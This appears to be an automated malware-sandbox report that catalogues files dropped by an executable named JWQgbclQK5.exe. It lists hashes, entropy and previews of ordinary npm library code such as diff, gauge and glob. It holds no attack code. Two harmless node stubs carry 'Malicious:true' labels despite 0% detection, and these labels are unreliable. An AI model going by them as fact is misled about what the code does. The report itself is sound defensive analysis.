              SHA-512:BECC39AB6E9F671F02AF2F1C9BFE0A4A0251655D65B5EBCC339192A4BCB87158ECF79A1EC1E811CC6E02CF75B2CA6FECB26D3EF6516BA23458A942C2D97BF6C7
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.structuredPatch = structuredPatch;.exports.formatPatch = formatPatch;.exports.createTwoFilesPatch = createTwoFilesPatch;.exports.createPatch = createPatch;../*istanbul ignore end*/.var./*istanbul ignore start*/._line = require("../diff/line")./*istanbul ignore end*/.;../*istanbul ignore start*/ function _toConsumableArray(arr) { return _arrayWithoutHoles(arr) || _iterableToArray(arr) || _unsupportedIterableToArray(arr) || _nonIterableSpread(); }..function _nonIterableSpread() { throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }..function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.na
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (34588)
              Category:dropped
              Size (bytes):50907
              Entropy (8bit):5.768412581651993
              Encrypted:false
              SSDEEP:
              MD5:5B61ED37DF8D8D18440DB735CD95ECA5
              SHA1:11CC5226CA662B116B2026301DCFBF9AC47F9624
              SHA-256:E787B5D3A9BFE5993416133A6438A43AF5BB7B6DFC5D4E1862AA88D86EE08A13
              SHA-512:FB412FB71B361DDD33D20ED85593685C570F88350C307760AA0B04B06BC64061C5D881187C23945202361D50F8E0786585550746B5F04456D99A17147F686AC2
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.calcLineCount = calcLineCount;.exports.merge = merge;../*istanbul ignore end*/.var./*istanbul ignore start*/._create = require("./create")./*istanbul ignore end*/.;..var./*istanbul ignore start*/._parse = require("./parse")./*istanbul ignore end*/.;..var./*istanbul ignore start*/._array = require("../util/array")./*istanbul ignore end*/.;../*istanbul ignore start*/ function _toConsumableArray(arr) { return _arrayWithoutHoles(arr) || _iterableToArray(arr) || _unsupportedIterableToArray(arr) || _nonIterableSpread(); }..function _nonIterableSpread() { throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }..function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (13176)
              Category:dropped
              Size (bytes):17908
              Entropy (8bit):5.853143132472019
              Encrypted:false
              SSDEEP:
              MD5:38667189B33238EE8B6216CEFB6D271C
              SHA1:6C174DC63006189B717BCF558AC5319BE6E8357D
              SHA-256:0A0C0401D39F10012C9A1D5597A390F891C48C6DE880F7F8F4BFF854FA63A882
              SHA-512:9D82370E61A870D0277021E2A5F316602D8E3411CDF641731DC32BC9D529D28FB0A03555B8B0551EFA395B43199936822705EA01D2897851FAAB24F75F03A907
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.parsePatch = parsePatch;../*istanbul ignore end*/.function parsePatch(uniDiff) {. /*istanbul ignore start*/. var. /*istanbul ignore end*/. options = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};. var diffstr = uniDiff.split(/\r\n|[\n\v\f\r\x85]/),. delimiters = uniDiff.match(/\r\n|[\n\v\f\r\x85]/g) || [],. list = [],. i = 0;.. function parseIndex() {. var index = {};. list.push(index); // Parse diff metadata.. while (i < diffstr.length) {. var line = diffstr[i]; // File header found, end parsing diff metadata.. if (/^(\-\-\-|\+\+\+|@@)\s/.test(line)) {. break;. } // Diff index... var header = /^(?:Index:|diff(?: -r \w+)+)\s+(.+?)\s*$/.exec(line);.. if (header) {. index.index = header[1];. }.. i++;. } // Parse file headers if they are defined. Unified diff requires the
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1476)
              Category:dropped
              Size (bytes):2026
              Entropy (8bit):5.827240184816126
              Encrypted:false
              SSDEEP:
              MD5:F6788F9800BC1DD34B316D4DCCF84BDD
              SHA1:63F50C586DF5DBCAC695FB7CF71BB1AFE9715980
              SHA-256:856782965C876EAB3E9C2B8325B875DEE5BB7D21D3CA4545C2B6EB5801F355ED
              SHA-512:52046F78E3C75219FE19129FDB5821FA54E649CEA67075E2031DF79281B67345100EBA6D1063D42EFD44F4A2D8CF15C3F389DFCD51F64A7B3D0D65B826595B23
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.arrayEqual = arrayEqual;.exports.arrayStartsWith = arrayStartsWith;../*istanbul ignore end*/.function arrayEqual(a, b) {. if (a.length !== b.length) {. return false;. }.. return arrayStartsWith(a, b);.}..function arrayStartsWith(array, start) {. if (start.length > array.length) {. return false;. }.. for (var i = 0; i < start.length; i++) {. if (start[i] !== array[i]) {. return false;. }. }.. return true;.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy91dGlsL2FycmF5LmpzIl0sIm5hbWVzIjpbImFycmF5RXF1YWwiLCJhIiwiYiIsImxlbmd0aCIsImFycmF5U3RhcnRzV2l0aCIsImFycmF5Iiwic3RhcnQiLCJpIl0sIm1hcHBpbmdzIjoiOzs7Ozs7Ozs7O0FBQU8sU0FBU0EsVUFBVCxDQUFvQkMsQ0FBcEIsRUFBdUJDLENBQXZCLEVBQTBCO0FBQy9CLE1BQUlELENBQUMsQ0FBQ0UsTUFBRixLQUFhRCxDQUFDLENBQUNDLE1BQW5CLEVBQTJCO0FBQ3pCLFdBQU8sS0FBUDtBQUNEOztBQUVELFNBQU9DLGV
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (3156)
              Category:dropped
              Size (bytes):4641
              Entropy (8bit):5.79851409135685
              Encrypted:false
              SSDEEP:
              MD5:CEDE259C351C752B8FA90BC48AF624E9
              SHA1:E41C1F463C03D985703C584A35080A638DAC2B8E
              SHA-256:617C8651D583F7B95543555B4B12C987893D6FF583A98F56872E6096EBD1D880
              SHA-512:73445EE1506C7C3EB089824CDBE2661DF11BA9E346A0B91D65A118605AC65F98E2EC00806A67333ACF6F3531B1ECB73D80AA3AD16CA9EBD097C0311B0D3E1681
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports["default"] = _default;../*istanbul ignore end*/.// Iterator that traverses in the range of [min, max], stepping.// by distance from a given start position. I.e. for [0, 4], with.// start of 2, this will iterate 2, 3, 1, 4, 0..function./*istanbul ignore start*/._default./*istanbul ignore end*/.(start, minLine, maxLine) {. var wantForward = true,. backwardExhausted = false,. forwardExhausted = false,. localOffset = 1;. return function iterator() {. if (wantForward && !forwardExhausted) {. if (backwardExhausted) {. localOffset++;. } else {. wantForward = false;. } // Check if trying to fit beyond text length, and if not, check it fits. // after offset location (or desired location on first iteration)... if (start + localOffset <= maxLine) {. return localOffset;. }.. forwardExhausted = true;. }..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (1248)
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):5.894900194331878
              Encrypted:false
              SSDEEP:
              MD5:BD5A264C506F8339FCA0ADE01D3D7F95
              SHA1:A91CE1B1AE0C9ECEF4D51F72599D010E3F49F972
              SHA-256:2BE26E04FC40DBA9A196233B9D5523F04FB603534F4DD8C763C1E9D10E4A816F
              SHA-512:C9EE7C461C8016094EADE64DDF9160FEC22E9CF699ADB28622DE83D3800F57D128A57F0ECF98625E786D2062E348B71151929DF05FEFE0648178F01C6B9173FB
              Malicious:false
              Reputation:unknown
              Preview:/*istanbul ignore start*/."use strict";..Object.defineProperty(exports, "__esModule", {. value: true.});.exports.generateOptions = generateOptions;../*istanbul ignore end*/.function generateOptions(options, defaults) {. if (typeof options === 'function') {. defaults.callback = options;. } else if (options) {. for (var name in options) {. /* istanbul ignore else */. if (options.hasOwnProperty(name)) {. defaults[name] = options[name];. }. }. }.. return defaults;.}.//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi4uLy4uL3NyYy91dGlsL3BhcmFtcy5qcyJdLCJuYW1lcyI6WyJnZW5lcmF0ZU9wdGlvbnMiLCJvcHRpb25zIiwiZGVmYXVsdHMiLCJjYWxsYmFjayIsIm5hbWUiLCJoYXNPd25Qcm9wZXJ0eSJdLCJtYXBwaW5ncyI6Ijs7Ozs7Ozs7O0FBQU8sU0FBU0EsZUFBVCxDQUF5QkMsT0FBekIsRUFBa0NDLFFBQWxDLEVBQTRDO0FBQ2pELE1BQUksT0FBT0QsT0FBUCxLQUFtQixVQUF2QixFQUFtQztBQUNqQ0MsSUFBQUEsUUFBUSxDQUFDQyxRQUFULEdBQW9CRixPQUFwQjtBQUNELEdBRkQsTUFFTyxJQUFJQSxPQUFKLEVBQWE7QUFDbEIsU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:exported SGML document, ASCII text
              Category:dropped
              Size (bytes):798
              Entropy (8bit):5.092418661626419
              Encrypted:false
              SSDEEP:
              MD5:C637D431AC5FAADB34AFF5FBD6985239
              SHA1:0E28FD386CE58D4A8FCBF3561DDAACD630BC9181
              SHA-256:27D998B503B18CDB16C49E93DA04069A99BA8A1D7E18D67146DE8E242F9A6D21
              SHA-512:A4B744C1D494FCC55CD223C8B7B0AD53F3637AAC05FE5C9A2BE41C5F5E117610C75A323C7745DFEAE0DB4126F169C2B7B88649412B6044BA4A94E9A4D8D62535
              Malicious:false
              Reputation:unknown
              Preview: This file is automatically added by @npmcli/template-oss. Do not edit. -->..ISC License..Copyright npm, Inc...Permission to use, copy, modify, and/or distribute this.software for any purpose with or without fee is hereby.granted, provided that the above copyright notice and this.permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND NPM DISCLAIMS ALL.WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL.IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO.EVENT SHALL NPM BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER.TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE.USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7295
              Entropy (8bit):4.836788187157327
              Encrypted:false
              SSDEEP:
              MD5:84494738A069DEE30A8B3EF2B28EB547
              SHA1:C3C64CDEE39E1DE0007BBEED09E7C73151B7ACC5
              SHA-256:26225021BA13588B0467F0FC8850CDBF48382A114D3337169AA476BD57529E3B
              SHA-512:F3BA22CA0921EBBF9ADFD4C3C668D76A6DDD2C6A2AD2FFE289862EB203035037965CBE7165FAA05D27D8EED0790ECEC0C40E1DA1B1321200D2E9F77FFA421049
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var Plumbing = require('./plumbing.js').var hasUnicode = require('has-unicode').var hasColor = require('./has-color.js').var onExit = require('signal-exit').onExit.var defaultThemes = require('./themes').var setInterval = require('./set-interval.js').var process = require('./process.js').var setImmediate = require('./set-immediate')..module.exports = Gauge..function callWith (obj, method) {. return function () {. return method.call(obj). }.}..function Gauge (arg1, arg2) {. var options, writeTo. if (arg1 && arg1.write) {. writeTo = arg1. options = arg2 || {}. } else if (arg2 && arg2.write) {. writeTo = arg2. options = arg1 || {}. } else {. writeTo = process.stderr. options = arg1 || arg2 || {}. }.. this._status = {. spun: 0,. section: '',. subsection: '',. }. this._paused = false // are we paused for back pressure?. this._disabled = true // are all progress bar updates disabled?. this._showing = false // do we WANT the progress bar
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1279
              Entropy (8bit):4.808226486797932
              Encrypted:false
              SSDEEP:
              MD5:EA9B89A82C6935DD42F43F4A91CD4B3E
              SHA1:CED271EFE695D542670CC84C98435590956D97E8
              SHA-256:1E7982A4080950347C5C4A33C6A4E7E6E5A6C0AE0E0FB87301E62B48FC3A75F1
              SHA-512:2D47928DDCB872FB0336EE5FAC0389DBBF94A2A1148005783A67AE0CAB9A2707F0BECA660AAFFB2383602F42E2D41F5BCF4B03924828613AB8E36C74E9A1F5F3
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var consoleControl = require('console-control-strings').var renderTemplate = require('./render-template.js').var validate = require('aproba')..var Plumbing = module.exports = function (theme, template, width) {. if (!width) {. width = 80. }. validate('OAN', [theme, template, width]). this.showing = false. this.theme = theme. this.width = width. this.template = template.}.Plumbing.prototype = {}..Plumbing.prototype.setTheme = function (theme) {. validate('O', [theme]). this.theme = theme.}..Plumbing.prototype.setTemplate = function (template) {. validate('A', [template]). this.template = template.}..Plumbing.prototype.setWidth = function (width) {. validate('N', [width]). this.width = width.}..Plumbing.prototype.hide = function () {. return consoleControl.gotoSOL() + consoleControl.eraseLine().}..Plumbing.prototype.hideCursor = consoleControl.hideCursor..Plumbing.prototype.showCursor = consoleControl.showCursor..Plumbing.prototype.show = function (status) {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5950
              Entropy (8bit):4.6641203820368915
              Encrypted:false
              SSDEEP:
              MD5:CF43109055CAFCA38DAC321184CCC156
              SHA1:DBDAA677B6ECCCBC84AF96C665D37104DB42B092
              SHA-256:24B1E5D87BEE1B0334C6B7E92C9883F8C818568C88DD3F009792D76DAF5F4D65
              SHA-512:67B5AE37077E8C9FB9B97CC674C550C3BE156C273453F3343829A8C3DA3050ED60226C1907975C558C1C7CE3F48182494FB8A67ACCF25685EC4AB40BCF08D041
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var align = require('wide-align').var validate = require('aproba').var wideTruncate = require('./wide-truncate').var error = require('./error').var TemplateItem = require('./template-item')..function renderValueWithValues (values) {. return function (item) {. return renderValue(item, values). }.}..var renderTemplate = module.exports = function (width, template, values) {. var items = prepareItems(width, template, values). var rendered = items.map(renderValueWithValues(values)).join(''). return align.left(wideTruncate(rendered, width), width).}..function preType (item) {. var cappedTypeName = item.type[0].toUpperCase() + item.type.slice(1). return 'pre' + cappedTypeName.}..function postType (item) {. var cappedTypeName = item.type[0].toUpperCase() + item.type.slice(1). return 'post' + cappedTypeName.}..function hasPreOrPost (item, values) {. if (!item.type) {. return. }. return values[preType(item)] || values[postType(item)].}..function generatePreAndPost
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):93
              Entropy (8bit):4.241995613138929
              Encrypted:false
              SSDEEP:
              MD5:CF1C3E0E4BC3B07ADF812B1C70E8BDBD
              SHA1:5C2C33590101B8947FDFE9A22BA1D17B1F1E4D70
              SHA-256:19D2FA52118A39A7810EFEB7BCE45418F3E55EE7B445C85811D07A2F73B7BBB7
              SHA-512:D4D9F8DD9C997ECAF5A45A88E6627747701B38995EFC956CAF611A3679499896C08134A797C51A90B0A5A1DAD71B0C6A7F65BADEC68F568F9655BD486C7894E4
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.// this exists so we can replace it during testing.module.exports = setInterval.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):858
              Entropy (8bit):4.492729769941914
              Encrypted:false
              SSDEEP:
              MD5:9AFEDFE565B7E647CD86AFE30CA30F17
              SHA1:E3872150672C271BD72B4BD700CCFDA9F0B8DCB3
              SHA-256:0C313FA1C5E3AC4F064993E88CE4C074106BBD4154D90F291E4C0C42D7147004
              SHA-512:6464D0393DF7292169B920B729A99731605699D1E8080FBCBE714AC85B0A51BD7D52282247F6E0B8B22DE8F7BAA5101182EEDB45D6375160657773F90D4AA19A
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.var stringWidth = require('string-width').var stripAnsi = require('strip-ansi')..module.exports = wideTruncate..function wideTruncate (str, target) {. if (stringWidth(str) === 0) {. return str. }. if (target <= 0) {. return ''. }. if (stringWidth(str) <= target) {. return str. }.. // We compute the number of bytes of ansi sequences here and add. // that to our initial truncation to ensure that we don't slice one. // that we want to keep in half.. var noAnsi = stripAnsi(str). var ansiSize = str.length + noAnsi.length. var truncated = str.slice(0, target + ansiSize).. // we have to shrink the result to account for our ansi sequence buffer. // (if an ansi sequence was truncated) and double width characters.. while (stringWidth(truncated) > target) {. truncated = truncated.slice(0, -1). }. return truncated.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1577
              Entropy (8bit):4.711945266527462
              Encrypted:false
              SSDEEP:
              MD5:DA0CA97CC8EF387AC763D38BEC30BE5F
              SHA1:CF0432710533394F51727578192DD00BCD7311B5
              SHA-256:43E5385F29AB0655BE12C84D3E48247D9E0D47CDE96BE93272003895C93108D5
              SHA-512:CE74ECF9BB2C85EA3A7BD99CA3A736C11A85FA05C5B3DD035330271A334CBC422197A401AD7D8813ADDE6BC61785779821A1A2FD841A74495B413D4C064B8639
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "gauge",. "version": "5.0.1",. "description": "A terminal based horizontal gauge",. "main": "lib",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/gauge.git". },. "keywords": [. "progressbar",. "progress",. "gauge". ],. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/gauge/issues". },. "homepage": "https://github.com/npm/gauge",. "dependencies": {. "aproba": "^1.0.3 || ^2.0.0",. "color-support": "^1.1.3",. "console-control-strings": "^1.1.0",. "has-unicode": "^2.0.1",. "signal-exit": "^4.0.1",. "string-width": "^4.2.3",. "strip-ansi": "^6.0.1",. "wide-align": "^1.1.5". },. "devDependencies": {. "@npmcli/esli
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):8229
              Entropy (8bit):4.398557893899078
              Encrypted:false
              SSDEEP:
              MD5:B40F4A76BB4F1B80A8E613345E75A2A4
              SHA1:C1F345AFFAB0826E89E28C4D74B44C393B05BC78
              SHA-256:24896D04E4A5603433A5FEA82BAA55BA2A8DF27D13D43EEAA585BE935A2D5867
              SHA-512:BE29B91EB032E81F0A0D98090EC75ED9319710C1F3ED19AE86AC14E031DE0C52C679B26285AEB729210E075FDBF57290C44885DD50EC7331C313CAEF864B6C64
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.Glob = void 0;.const minimatch_1 = require("minimatch");.const path_scurry_1 = require("path-scurry");.const url_1 = require("url");.const pattern_js_1 = require("./pattern.js");.const walker_js_1 = require("./walker.js");.// if no process global, just call it linux..// so we default to case-sensitive, / separators.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * An object that can perform glob pattern traversals.. */.class Glob {. absolute;. cwd;. root;. dot;. dotRelative;. follow;. ignore;. magicalBraces;. mark;. matchBase;. maxDepth;. nobrace;. nocase;. nodir;. noext;. noglobstar;. pattern;. platform;. realpath;. scurry;. stat;. signal;. windowsPathsNoEscape;. withFileTypes;. /**. * The options provided to the constr
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1058
              Entropy (8bit):4.750882306296962
              Encrypted:false
              SSDEEP:
              MD5:078FBABB35426591CB06FD1199442926
              SHA1:E5FB79330EC44FD6AD4BB48C96D5F591880CBBD6
              SHA-256:1E4A9ACAFA68903D5331E17635339CA59C52B71152E82E195438ADC46EF7381A
              SHA-512:48DAD09AF0D65A7D9EB68A2199B33751F4351D0F3545D4D670D67B2D9F3077DA9049EA2187D0E972FD564E39C2D3590D7AA6DAE9C38497E55B48F4E5C06C1087
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.hasMagic = void 0;.const minimatch_1 = require("minimatch");./**. * Return true if the patterns provided contain any magic glob characters,. * given the options provided.. *. * Brace expansion is not considered "magic" unless the `magicalBraces` option. * is set, as brace expansion just turns one string into an array of strings.. * So a pattern like `'x{a,b}y'` would return `false`, because `'xay'` and. * `'xby'` both do not contain any magic glob characters, and it's treated the. * same as if you had called it on `['xay', 'xby']`. When `magicalBraces:true`. * is in the options, brace expansion _is_ treated as a pattern having magic.. */.const hasMagic = (pattern, options = {}) => {. if (!Array.isArray(pattern)) {. pattern = [pattern];. }. for (const p of pattern) {. if (new minimatch_1.Minimatch(p, options).hasMagic()). return true;. }. return false;.};.exports.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):3999
              Entropy (8bit):4.237597420679568
              Encrypted:false
              SSDEEP:
              MD5:0CF501C1503466C2E56829D265F32636
              SHA1:510F2C442C62EFB6B1CFBD60F772F4E5A0FEE48B
              SHA-256:795C90E61B9D585D71730A6D32730B566EC5BEAA5FB7FD2BC492A88F8F1710FE
              SHA-512:63F5CD30B0E01A5853CC7072104A43607E52696981D2BA7EBF8434E654A68F254659E571E15DC617CCAF6D06B6D50EC6B9780D46DF2ED6659159495399C730CA
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// give it a pattern, and it'll be able to tell you if.// a given path should be ignored..// Ignoring a path ignores its children if the pattern ends in /**.// Ignores are always parsed in dot:true mode.Object.defineProperty(exports, "__esModule", { value: true });.exports.Ignore = void 0;.const minimatch_1 = require("minimatch");.const pattern_js_1 = require("./pattern.js");.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * Class used to process ignored patterns. */.class Ignore {. relative;. relativeChildren;. absolute;. absoluteChildren;. constructor(ignored, { nobrace, nocase, noext, noglobstar, platform = defaultPlatform, }) {. this.relative = [];. this.absolute = [];. this.relativeChildren = [];. this.absoluteChildren = [];. const mmopts = {. dot: true,. nobrace,. nocase,.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2860
              Entropy (8bit):4.903912442335375
              Encrypted:false
              SSDEEP:
              MD5:E7AB0FB137DCB5CC862FBE1AB2CD7D85
              SHA1:342601487C426B0BFC2010CB2C5E792AEA12E805
              SHA-256:EDAD9C6E38C0338F940A098D7532F30D5566CC5C81A587D3B82B51E5A15FB678
              SHA-512:CD66A8FF2264BFB7D86AAA0EB972603AC6D3057509E419B8158E49C6F784F50A192F3C755B18AAEF8CBBED8D856972C15BE8A0A3B082A2008AC9FD1BEB7C36F3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.glob = exports.hasMagic = exports.Glob = exports.unescape = exports.escape = exports.sync = exports.iterate = exports.iterateSync = exports.stream = exports.streamSync = exports.globIterate = exports.globIterateSync = exports.globSync = exports.globStream = exports.globStreamSync = void 0;.const minimatch_1 = require("minimatch");.const glob_js_1 = require("./glob.js");.const has_magic_js_1 = require("./has-magic.js");.function globStreamSync(pattern, options = {}) {. return new glob_js_1.Glob(pattern, options).streamSync();.}.exports.globStreamSync = globStreamSync;.function globStream(pattern, options = {}) {. return new glob_js_1.Glob(pattern, options).stream();.}.exports.globStream = globStream;.function globSync(pattern, options = {}) {. return new glob_js_1.Glob(pattern, options).walkSync();.}.exports.globSync = globSync;.async function glob_(pattern, options = {}) {. return new glob_
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):19
              Entropy (8bit):3.6163485660751657
              Encrypted:false
              SSDEEP:
              MD5:95B08BC3062CDC4B0334FA9BE037E557
              SHA1:A6E024BC66F013D9565542250AEF50091391801D
              SHA-256:FA6944A20CA5E6FBAF98FD202EB8C7004D5B4AB786E36B9ED02EE31DBE196C9F
              SHA-512:65C66458ABE2101032CDD1B50CA6E643E0C368D09DFA6CC7006B33ED815E106BB20F9AFF118181807E7DF9F5D4D8D9796709B1EC9A7E04544231636FDF8FDF42
              Malicious:false
              Reputation:unknown
              Preview:{"type":"commonjs"}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):10772
              Entropy (8bit):4.069888415919053
              Encrypted:false
              SSDEEP:
              MD5:37353D862E7C28EEC6F1BBC0FBB016E2
              SHA1:F22E4431C8D88A005320091DA94B51E5EB41EAAA
              SHA-256:67101FB330007E0FA15E49A9B9D4C9CD919ED6A5EF7EBACFED181372A1648899
              SHA-512:D8F448063BAA96F96B9B3BADEC91A7CD0A49BD6D59D4284CAB1FBA8619B96B68C9FCDD4ACFE227C5FFB171C7F00D2525894FC02022AE4C8AAB58870507C527A1
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.// synchronous utility for filtering entries and calculating subwalks.Object.defineProperty(exports, "__esModule", { value: true });.exports.Processor = exports.SubWalks = exports.MatchRecord = exports.HasWalkedCache = void 0;.const minimatch_1 = require("minimatch");./**. * A cache of which patterns have been processed for a given Path. */.class HasWalkedCache {. store;. constructor(store = new Map()) {. this.store = store;. }. copy() {. return new HasWalkedCache(new Map(this.store));. }. hasWalked(target, pattern) {. return this.store.get(target.fullpath())?.has(pattern.globString());. }. storeWalked(target, pattern) {. const fullpath = target.fullpath();. const cached = this.store.get(fullpath);. if (cached). cached.add(pattern.globString());. else. this.store.set(fullpath, new Set([pattern.globString()]));. }.}.exports.HasWalkedCache = HasWalkedCache;./**. * A record of w
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):11532
              Entropy (8bit):4.315867288181973
              Encrypted:false
              SSDEEP:
              MD5:B1582D4A9554012D891BF077A7931D34
              SHA1:8FA2212E5287AFCE057E4D06424FEC29111D9B9A
              SHA-256:92DD4E831C7FFA00B61A871221C9240067C43AC77756B7111339BC482AB2C4C8
              SHA-512:8830FAE4E30F48D9A314C5F812E7EAC0D5A1C85F8C6B8737ECB33734A6011F94F817BFFA759EBA38BFC3442DD180A6620483607D3C6812D60EF40FAEB91950B0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.GlobStream = exports.GlobWalker = exports.GlobUtil = void 0;./**. * Single-use utility classes to provide functionality to the {@link Glob}. * methods.. *. * @module. */.const minipass_1 = require("minipass");.const ignore_js_1 = require("./ignore.js");.const processor_js_1 = require("./processor.js");.const makeIgnore = (ignore, opts) => typeof ignore === 'string'. ? new ignore_js_1.Ignore([ignore], opts). : Array.isArray(ignore). ? new ignore_js_1.Ignore(ignore, opts). : ignore;./**. * basic walking utilities that all the glob walker types use. */.class GlobUtil {. path;. patterns;. opts;. seen = new Set();. paused = false;. aborted = false;. #onResume = [];. #ignore;. #sep;. signal;. maxDepth;. constructor(patterns, path, opts) {. this.patterns = patterns;. this.path = path;. this.opts = opts;. this.#sep = !opts.posi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):65
              Entropy (8bit):4.7339277213076185
              Encrypted:false
              SSDEEP:
              MD5:35913B4F1575714F600C4D498076AAFA
              SHA1:689039B283403ED3DA5CB2427188D4165078AB90
              SHA-256:964EDDED777BD10B441E2D101AD68E1DE592B4D6047831D691504B1C24E4EE4C
              SHA-512:BC3FC768BC6194BD0B1248E3874D324CC969030A91150659325BB3CC0B340BCF0E7FEDA84C7AB077F0C077274D12BB5DE3DDBDAD7819BA38E525182D040AAC12
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.export {};.//# sourceMappingURL=bin.d.mts.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):9754
              Entropy (8bit):4.242872224445212
              Encrypted:false
              SSDEEP:
              MD5:BD42B92E8422CAB9568D0AE130127299
              SHA1:BE2BB11799BEA00D7A1A28D39776FFAA44C4C2F4
              SHA-256:281EF5566A7014F89C8C73512543417EEADE8CC67516E131CBD9B3E031CB3856
              SHA-512:5FC05C6043B925A6E7500638CE94363C990FD65A78DEE2892DE27BFEC710408B06EFE449FEB0005894AA3C38B9E7702AD8A46777395CF0438139C4E600C4754E
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
